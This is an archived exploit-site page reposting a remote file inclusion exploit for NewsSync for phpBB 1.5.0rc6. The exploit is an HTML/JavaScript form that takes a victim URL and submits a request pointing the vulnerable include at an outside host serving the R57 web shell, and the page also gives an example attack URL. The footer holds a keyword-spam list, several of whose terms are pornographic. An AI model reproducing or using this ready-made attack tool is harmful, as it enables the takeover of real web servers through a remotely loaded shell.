about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , NewsSync for phpBB 1.5.0rc6 Remote File Inclusion Exploit




2007-06-08 NewsSync for phpBB 1.5.0rc6 Remote File Inclusion Exploit 
Rated as : High Risk

<html>
<head>
<meta http-equiv="Content-Type" content="text/html;
charset=windows-1254">
<title>newsSync 1.5.0rc6 (nuke_include.php) Remote File Inclusion 
Exploit</title>

<script language="JavaScript">

//'===============================================================================================
//'[Script Name: newsSync 1.5.0rc6
//'[Author     : GoLd_M = Mahmood_ali
//'[S.Page     :
http://www.coolerclimate.com/downloads/newssync_1.5.0rc6.tar
//'===============================================================================================

//'[[V.Code]]------------------------------------------------------
//'
//'<?php
//'
//'if ($newsSync_enable_phpnuke_mod) {
//'	ini_set("include_path",ini_get("include_path").":$newsSync_NUKE_PATH");
//'	require_once("$newsSync_NUKE_PATH/mainfile.php");
//'
//'[[V.Code]]---------------------------------------------------------

//#
//# Ex:
//#
/inc/nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=http://localhost/trayg.txt?
//# Video:
//# http://norcalvex.org/v1d30/newsSync-video.rar
//# Sp.TanX : Tryag.Com/cc
//#



   var path="/inc/"
   var adres="nuke_include.php" //File name
   var acik
="?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=" // Line 3 &
5
   var shell="http://dr3.150m.com/r57.txt?" // R57Shell

   function command(){
       if (document.rfi.target1.value==""){
          alert("Failed..");
      return false;
    }



  rfi.action= document.rfi.target1.value+path+adres+acik+shell; // Ready
  rfi.submit(); // Form Submit
   }
</script>

</head>

<body bgcolor="#000000">
<center>

<p><b><font face="Arial" size="2"
color="#FFFFFF">newsSync 1.5.0rc6 
(nuke_include.php) Remote File Inclusion
Exploit</font></b></p>

<p></p>
<form method="post" target="getting"
name="rfi" onSubmit="command();">
    <b><font face="Tahoma" size="1"
color="#FF0000">Target:</font><font
face="Tahoma" size="1"
color="#FFFF00">[http://[vicim]/[path]</font><font
color="#00FF00" size="2" face="Tahoma">
  </font><font color="#FF0000"
size="2"> </font></b>
  <input type="text" name="target1"
size="20" style="background-color: #808000"
onmouseover="javascript:this.style.background='#808080';"
onmouseout="javascript:this.style.background='#808000';"></p>
  <p><input type="submit" value="Gonder"
name="B1"><input type="reset"
value="Sifirla" name="B2"></p>
</form>
<p><br>
<iframe name="getting" height="337"
width="633" scrolling="yes"
frameborder="0"></iframe>
</p>

<b><font face="Lucida Handwriting" size="5"
color="#FF0000">Mahmood_ali</font></b><p>
<b><a href="http://tryag.com/cc">
<font face="Lucida Handwriting" size="5"
color="#FFFFFF">TrYaG-Team</font></a></b></p>
</p>
</center>
</body>

</html>


securitydot.net - 2007-06-08

Advertising

Copyright 2007, SecurityDot
Fri, 20 Nov 2009 22:20:02 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Saxy women *saniyamir efw ventrillo naruto vid mozilla/5. sex-jet CMS is Fre mambo//ind vbook www.jlg.cn a.mmlian12 Www.Tamil Saxy_sari a.sebang45 Gadis boke xxxvedios www.segou1 yxzxy.cn www.softge esther kar mozilla/5. Cerita Nge Www.Sexy89 Www.sexypi news for C VBulletin Sex Gadis nepalsex.c wwwsex.de. www.90645. AXIS 206W Sexcy stel file nail 200 /compo lolywoodse Sex vedioe Photo indi a.qvod123. TOLLYWOOD blog.163.c www.kos69. c...exstat sexypornwo trasha bat exploits f sexypornwo guest book a5.selunta www.teenor